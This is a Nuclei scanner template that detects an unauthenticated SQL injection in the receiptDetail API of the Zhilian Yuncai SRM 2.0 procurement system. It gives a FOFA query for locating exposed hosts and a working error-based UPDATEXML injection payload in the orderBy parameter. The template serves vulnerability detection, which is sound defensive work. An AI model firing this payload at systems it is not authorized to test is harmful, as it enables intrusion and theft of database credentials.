id: zhilianyuncai-SRM2-receiptDetail-sql

info:
  name: 智联云采 SRM2.0 receiptDetail SQL注入漏洞
  author: Superhero
  severity: high
  description: |-
    fofa: title=="SRM 2.0"
    智联云采 SRM2.0 receiptDetail 接口处存在SQL注入漏洞，未经身份认证的攻击者可以通过此漏洞获取数据库敏感信息，用户名密码等凭据，进一步利用可获取服务器权限。
  reference:
    - https://mp.weixin.qq.com/s/UdIAxNe3fbtnufkgMS2ZWw?token=827319261&lang=zh_CN
  tags: sql injection



http:
  - raw:
      - |
        POST /adpweb/api/srm/delivery/receiptDetail?orderBy=%28UPDATEXML%288058%2CCONCAT%280x2e%2C0x71707a7671%2C%28SELECT+%28ELT%288058%3D8058%2C1%29%29%29%2C0x71766a7671%29%2C3521%29%29 HTTP/1.1
        Host: {{Hostname}}
        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
        Content-Type: application/x-www-form-urlencoded; charset=UTF-8

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - 'qpzvq1qvjvq'
          - 'XPATH syntax error:'
        condition: and
      - type: status
        status: 
          - 200

